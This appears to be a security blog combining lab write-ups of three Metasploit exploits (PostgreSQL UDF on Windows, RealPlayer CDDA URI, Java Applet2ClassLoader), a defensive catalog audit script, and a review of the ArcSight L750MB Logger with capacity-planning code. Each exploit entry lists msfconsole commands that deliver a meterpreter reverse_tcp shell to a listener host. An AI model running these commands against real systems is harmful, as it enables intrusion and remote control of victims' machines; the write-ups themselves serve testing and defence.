PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele on 2009-04-01
Metasploit PoC provided by todb on 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All PostgreSQL releases for Microsoft Windows up to and including 8.4.x, 32-bit.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLLs from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.
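Because the technique leaves a C-language function and a large object behind, a DBA can look for both in the catalogs. The following is an added example, not code from the Metasploit module or from the original post: two catalog queries for the PostgreSQL 8.4 catalogs (pg_proc.probin holds the library path of LANGUAGE C functions; pg_largeobject holds the staged pages), plus Python helpers that classify the rows the queries return. The sample rows, the trusted install prefix and the DLL names are constructed for the demonstration.

```python
"""Defender-side audit for UDF libraries loaded from unexpected places.

Added example (not part of the Metasploit module or the original post).
The SQL is meant to be run by a superuser on a PostgreSQL 8.4 server; the
Python functions classify the returned rows so the logic runs offline here
on constructed sample rows.
"""
import re

# Every C-language function and the shared library it is loaded from.
SQL_C_FUNCTIONS = """
SELECT p.proname, p.probin
FROM pg_proc p
JOIN pg_language l ON l.oid = p.prolang
WHERE l.lanname = 'c';
"""

# Large objects whose first page carries the 'MZ' header of a Windows
# executable or DLL, i.e. a binary staged through UPDATE pg_largeobject.
SQL_PE_LARGE_OBJECTS = """
SELECT loid
FROM pg_largeobject
WHERE pageno = 0 AND substring(data from 1 for 2) = 'MZ'::bytea;
"""

# A legitimate extension library is never loaded from a temp directory.
TEMP_DIR = re.compile(r"[\\/](temp|tmp)[\\/]", re.IGNORECASE)

# $libdir is PostgreSQL's own library directory; the absolute prefix is an
# assumed default Windows install location (constructed for the example).
TRUSTED_PREFIXES = ("$libdir", r"C:\Program Files\PostgreSQL")


def is_suspicious_udf(proname, probin, trusted_prefixes=TRUSTED_PREFIXES):
    """Return a reason string for a suspicious library path, or None."""
    if probin is None:               # built-in functions carry no library
        return None
    path = probin.replace("/", "\\")
    if TEMP_DIR.search(path):
        return "temp_dir"
    for prefix in trusted_prefixes:
        if path.lower().startswith(prefix.replace("/", "\\").lower()):
            return None
    return "untrusted_dir"


def audit_c_functions(rows, trusted_prefixes=TRUSTED_PREFIXES):
    """rows: (proname, probin) tuples as returned by SQL_C_FUNCTIONS."""
    hits = []
    for proname, probin in rows:
        reason = is_suspicious_udf(proname, probin, trusted_prefixes)
        if reason:
            hits.append((proname, probin, reason))
    return hits


def looks_like_pe(first_page):
    """True if a large object's page 0 starts with the PE/MZ signature."""
    return first_page[:2] == b"MZ"


def find_pe_large_objects(pages):
    """pages: (loid, pageno, data) tuples from pg_largeobject."""
    return sorted(loid for loid, pageno, data in pages
                  if pageno == 0 and looks_like_pe(data))


# Constructed sample rows (not taken from a real server).
SAMPLE_C_FUNCTIONS = [
    ("dblink_connect", "$libdir/dblink"),
    ("my_ext_fn", r"C:\Program Files\PostgreSQL\8.4\lib\my_ext.dll"),
    ("sys_exec", r"C:\WINDOWS\Temp\EXAMPLE_UDF.dll"),           # placeholder
    ("helper", r"C:\Documents and Settings\postgres\Local Settings\Temp\x.dll"),
]
SAMPLE_PAGES = [
    (16400, 0, b"\x00\x01\x02\x03"),        # ordinary binary data
    (16401, 0, b"MZ\x90\x00\x03\x00\x00"),  # a staged PE image
    (16401, 1, b"MZ"),                      # not page 0, ignored
]

if __name__ == "__main__":
    for hit in audit_c_functions(SAMPLE_C_FUNCTIONS):
        print("suspicious UDF:", hit)
    print("PE large objects:", find_pe_large_objects(SAMPLE_PAGES))
```

Run the two SQL statements on the server, then feed the rows to audit_c_functions and find_pe_large_objects; any hit in a temp directory, or any large object starting with MZ, is worth a closer look.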

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI on 2009-11-24
Coordinated public release of advisory on 2010-10-15
Saint PoC provided on 2010-10-22
Metasploit PoC provided on 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory is executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI on 2010-09-28
Coordinated public release of advisory on 2011-02-15
Vulnerability details publicly released by Frederic Hoguin on 2011-03-11
Metasploit PoC provided on 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 and JDK 6 Update 23 and earlier

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with (1) a “codebase” parameter that points at a trusted directory and (2) a “code” parameter that is a URL that does not contain any dots, the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

ArcSight L750MB Logger features and limits

ArcSight L750MB Logger has been free since 16 August. A good occasion to discover this Logger version and to get to know the features and limits of this product.

After registration with the promotional code (no CCN is asked for), you will receive two separate emails. One gives you access to the ArcSight Download Center, and one hour later you will receive your free licence key attached to the second email. Fortunately, since two or three weeks ago, registrations are also allowed for users who are outside the US & Canada.

From the ArcSight Download Center, you will first be able to download :

  • The latest version of ArcSight L750MB Logger – 5.0 Patch 2 (5.0.0.5355.2) – 438.8 MB.
  • All L750MB related documentation (Administrator Guide, Quick Start, Release Notes & the Software Licence Agreement).
  • Limited ArcSight Syslog SmartConnectors for Linux and Windows (229.4 MB for Linux and 187 MB for Windows).
  • All the documentation for the limited Syslog SmartConnectors.

Supported Platforms & Browsers

Certified Operating Systems for ArcSight L750MB Logger installation are :

  • Red Hat Enterprise Linux (RHEL), version 5.4, 64-bit
  • Oracle Enterprise Linux (OEL) 5.4, 64-bit
  • CentOS, version 5.4, 64-bit

Other supported Operating Systems are :

  • Red Hat Enterprise Linux (RHEL), version 4.x, 64-bit
  • CentOS, version 4.x, 64-bit

Virtual machine installation of the above listed operating systems is supported. You will not be able to install the Logger on an existing machine that is running MySQL or PostgreSQL. We recommend a completely dedicated operating system for the installation.

Supported browsers (with the Adobe Flash Player plug-in) are :

  • Internet Explorer: Versions 7 and 8
  • Firefox: Versions 3.0 and 3.5

Hardware requirements :

  • 100 GB of disk space will be enough because the L750MB Logger is limited to 50 GB of compressed logs (10:1).
  • A minimum of 2 GB of memory, though 4 GB is better to take advantage of the 64-bit OS.
  • 1 to 2 CPU cores are enough given the other L750MB limitations.

SmartConnectors provided with L750MB

SmartConnectors give you the ability to send CEF-normalized and aggregated events to the Logger. To use SmartConnectors with ArcSight Logger you need to create a “Smart Message Receiver” on the Logger.

I was surprised to see that the SmartConnectors provided with the L750MB Logger version are very limited in number. Normally ArcSight covers around 250 different products with its SmartConnector technology. With L750MB you are able to install and use the following SmartConnectors :

  • Cisco PIX/ASA (an average of 200 bytes per event)
  • Cisco IOS Routers and Switches (an average of 150 bytes per event)
  • Juniper Network and Security Manager (NSM) (an average of 300 bytes per event)
  • Juniper JUNOS Routers and Switches (an average of 300 bytes per event)
  • Red Hat Enterprise Linux (an average of 150 bytes per event)
  • SNARE (an average of 800 bytes per event, depending on the Windows OS)
  • Snort (an average of 200 bytes per event)

In addition to, or instead of, SmartConnectors, you can use the following other Logger Receivers :

  • Syslog (UDP or TCP)
  • File Transfer in SCP, SFTP or FTP.
  • CEF TCP or UDP

The File Receiver is disabled because the L750MB Logger does not allow you to mount NFS, CIFS or SAN shares.

L750MB Features, Limitations and Restrictions

Features :

  • Connector appliance features are disabled.
  • Alerting module features are enabled.
  • Reporting module features are enabled.
  • SAN storage feature is disabled.
  • Logger peering features are disabled.

Logger limits :

  • A maximum of 10 devices can send their logs to the L750MB Logger. A device is the IP of the event generator. For example, if you have a Linux box with Syslog and Snort, the 2 event sources will be considered as coming from the same generator IP. However, a device on the Logger is the combination of a generator IP and a Receiver, so we recommend using the same Receiver for the event sources on the same generator IP.
  • The maximum amount of data collected per day is 750 MB. The sum of the sizes of the original events is used to determine this value. With an average event size of 300 bytes, 750 MB represents 2 621 440 events per day ((750 * 1024 * 1024) / 300).
  • The EPS rate is limited to a maximum of 60, so you will have at most 5 184 000 events per day (60 * 86 400). But the 750 MB limit will stop you before you reach 60 EPS if you are running SmartConnectors like SNARE or Juniper.
  • The maximum data retention is 50 GB with a compression rate of 10:1 (500 GB of original events). But the Logger needs an “Internal Event Storage Group” of 5 GB, so the maximum data retention is more like 45 GB (450 GB). This compression rate lets you store around 1 610 612 736 events ((450 x 1024 x 1024 x 1024) / 300). Compared with the 750 MB daily limit, this total gives a retention period of 614.4 days (1 610 612 736 / 2 621 440).
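The four limits above interact: which one binds first depends on the average event size of the connectors you run. As an added example (not from the original post or from ArcSight), the following Python script generalizes the 300-byte calculation above to every bundled SmartConnector's quoted average size, and checks a planned fleet of sources against the 10-device, 750 MB/day and 60 EPS limits. The fleet, its IPs, receiver names and EPS figures are constructed for the demonstration.

```python
"""Capacity planning for the L750MB Logger limits described in the post.

Added example, not code from the original post or from ArcSight. Limits and
average event sizes are the figures quoted in the post; the sample fleet is
constructed.
"""
MB = 1024 * 1024
GB = 1024 * MB
DAILY_BYTES = 750 * MB            # 750 MB of original events per day
MAX_EPS = 60
MAX_DEVICES = 10
SECONDS_PER_DAY = 86_400
# 50 GB compressed minus the 5 GB internal storage group, at 10:1 -> 450 GB raw
RETENTION_RAW_BYTES = (50 - 5) * GB * 10

# Average event sizes quoted in the post for the bundled SmartConnectors.
AVG_EVENT_BYTES = {
    "Cisco PIX/ASA": 200,
    "Cisco IOS": 150,
    "Juniper NSM": 300,
    "Juniper JUNOS": 300,
    "Red Hat Enterprise Linux": 150,
    "SNARE": 800,
    "Snort": 200,
}


def events_per_day_cap(avg_event_bytes):
    """Daily event budget and the limit that imposes it."""
    by_volume = DAILY_BYTES // avg_event_bytes
    by_eps = MAX_EPS * SECONDS_PER_DAY
    if by_volume < by_eps:
        return by_volume, "750 MB/day"
    return by_eps, "60 EPS"


def effective_eps(avg_event_bytes):
    """Sustained EPS you can actually use with events of this size."""
    return events_per_day_cap(avg_event_bytes)[0] / SECONDS_PER_DAY


def retention_days(avg_event_bytes):
    """Days of history that fit in the 450 GB raw budget at the daily cap."""
    stored_events = RETENTION_RAW_BYTES // avg_event_bytes
    return stored_events / events_per_day_cap(avg_event_bytes)[0]


def plan(sizes=AVG_EVENT_BYTES):
    """Per-connector summary: cap, binding limit, usable EPS, retention."""
    return {
        name: {
            "events_per_day": events_per_day_cap(size)[0],
            "binding_limit": events_per_day_cap(size)[1],
            "eps": round(effective_eps(size), 1),
            "retention_days": round(retention_days(size), 1),
        }
        for name, size in sizes.items()
    }


def check_fleet(sources):
    """sources: (generator_ip, receiver, connector, eps) tuples.

    A device is a (generator IP, receiver) pair, as the post explains, so two
    sources on one host that share a receiver count once.
    """
    devices = {(ip, receiver) for ip, receiver, _, _ in sources}
    total_eps = sum(eps for _, _, _, eps in sources)
    daily_bytes = sum(eps * SECONDS_PER_DAY * AVG_EVENT_BYTES[connector]
                      for _, _, connector, eps in sources)
    violations = []
    if len(devices) > MAX_DEVICES:
        violations.append("10 devices")
    if total_eps > MAX_EPS:
        violations.append("60 EPS")
    if daily_bytes > DAILY_BYTES:
        violations.append("750 MB/day")
    return {"devices": len(devices), "total_eps": total_eps,
            "daily_bytes": int(daily_bytes), "violations": violations}


# Constructed sample fleet: one Linux box sending syslog and Snort through
# the same receiver, two Windows hosts with SNARE, and a firewall.
SAMPLE_FLEET = [
    ("10.0.0.5", "syslog-udp", "Red Hat Enterprise Linux", 2.0),
    ("10.0.0.5", "syslog-udp", "Snort", 3.0),
    ("10.0.0.21", "smartmsg", "SNARE", 4.0),
    ("10.0.0.22", "smartmsg", "SNARE", 4.0),
    ("10.0.0.1", "smartmsg", "Cisco PIX/ASA", 5.0),
]

if __name__ == "__main__":
    for name, row in plan().items():
        print(f"{name:26} {row}")
    print(check_fleet(SAMPLE_FLEET))
```

The per-connector table shows that the 150-byte sources (Cisco IOS, RHEL) are the only ones that can reach the 60 EPS ceiling; every larger event size runs into the 750 MB daily limit first, which is the effect the post notes for SNARE and Juniper. check_fleet applies the same arithmetic to a concrete list of sources before you commit to a deployment.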

If the limit of 750 MB per day is exceeded, the software version of Logger continues to collect and store events. However, if this limit is exceeded 5 times (5 days) in a 30-day sliding window, you will no longer be able to run “Searches” or “Reports” on the collected events until the 30-day sliding window contains 4 or fewer data limit violations. A warning message is displayed when a data limit violation occurs. You can also view the data limit violation information on the License information page.

ArcSight L750MB Logger is really a good solution for SMB companies that don't necessarily have a lot of devices, but the limitation in supported SmartConnectors is a point that may encourage IT guys to select a product with more natively supported products.

Thanks to Christophe Briguet for his Log Caliper iPhone/iPad application 🙂